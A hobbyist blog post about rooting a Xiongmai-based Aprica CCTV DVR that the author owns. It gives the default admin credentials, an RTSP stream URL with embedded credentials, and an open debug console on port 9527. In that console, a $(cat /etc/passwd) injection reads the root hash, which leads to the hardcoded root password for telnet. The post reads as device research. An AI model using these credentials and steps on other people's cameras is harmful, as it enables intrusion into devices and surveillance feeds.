Notes on Hacking an Aprica 8 Channel CCTV

apricaQuick initial notes on hacking the “Aprica” CCTV 8 Channel DVR as sold in kit form on Takealot in South Africa. (Was on special at one point for R 2650 but now no longer sold)

The device appears to be based on a Hangzhou Xiongmai Technology http://www.xiongmaitech.com/ DVR board, I’ve not found the exact model board yet, the closest one I’ve found http://www.xiongmaitech.com/en/index.php/product/product-detail/148/96/122 however mine only has a single SATA port.

Firmware

At the time of writing this I had not yet found a firmware image for the device, if anyone knows where I can find one (ideally with the Aprica branding) please let me know.

Software

The CMS and DeviceManager software from Xiongmaitech do work with the DVR device and allow for better remote control and configuration.

Username & Password

The username for the web interface is admin with an empty default password, you can use these same details on the CMS software and DeviceManager and the device its self.

Web Interface

The web interface (accessible via the standard http port) uses an ActiveX control to display the live video streams from the cameras. You can manually open the underlying streams in a media player (like VLC or mplayer) by connecting to the following URL.

rtsp://192.168.1.35:554/user=admin&password=&channel=1&stream=0.sdp?real_stream–rtp-caching=100

Replace 192.168.1.35 with the IP of the DVR, the channel is the camera no and stream is 0 for the high-resolution feed or 1 for the lower-resolution.

Getting shell access

I want access to the Linux shell on the device so that I can do some more digging around on the device. A quick nmap scan of the machine shows the following ports open.

23/tcp open telnet
80/tcp open http
554/tcp open rtsp
9527/tcp open unknown
34567/tcp open unknown

34567 is used by the control software (CMS or DeviceManager) to control the device via the network.
23 opens a telnet port that prompts for a username and password.

9527 is interesting, if you telnet to this port and hit enter you’ll get a username: prompt. You can use your standard admin login at this login and you’ll be greeted by an admin$ prompt, typing help at this prompt gets the following interesting list of commands.

----------------------Console Commands---------------------------- 
 232 Comm dump 
 485Pro 485 Protocol! 
 Encoder Encoder info! 
 ability Net Ability Utility! 
 ad AD debug interface! 
 alarm Alarm status! 
 autoshut auto shut the DVR 
 
 autotest AutoTest Command! 
 
 bitrate Dump BitRate infomation! 
 bps bps commands! 
 cfg Config Help Utility! 
 comm Comm Input String 
 decoder decorder operation command! 
 encode Encode commands! 
 front front board utility! 
 
 fs Fs debug interface! 
 heap Dump heap status! 
 help Try help! 
 hvr NetDecorderManager Dump! 
 localPlay local play console! 
 log Log utility! 
 netitf NetInterFace Dump! 
 netm NetManager Dump! 
 packet Packet usage! 
 ptz ptz dump! 
 quit Quit! 
 reboot Reboot the system! 
 record Record console utility! 
 resource CPU usage! 
 rtp RTP Dump! 
 screen snapshot current screen! 
 
 shell Linux shell prompt! 
 shutdown Shutdown the system! 
 thread Dump application threads! 
 time Set SystemTime! 
 timer Dump application timers! 
 upgrade Upgrade utility! 
 user Account Information! 
 ver version info! 
To see details, please use 'cmd -h'

The most interesting is the ‘shell’ command, this appears to give you a broken linux shell of some kind. Normal linux commands don’t appear to work properly but echo $PATH shows you the path so its half working?

Through some trial and error I was able to figure out a way to execute some commands, in the end I managed to cat the /etc/passwd file by wrapping the command in $()

$(cat /etc/passwd)
: not foundsxcfbgXtb3o:0:0:root:/:/bin/sh

You’ll see that part of the /etc/passwd file above is obstructed by “: not found” however this was enough to get the hash for the password for root.

A quick google search for the hash absxcfbgXtb3o and I found the root password xc3511

Now I can login to the device via telnet as root.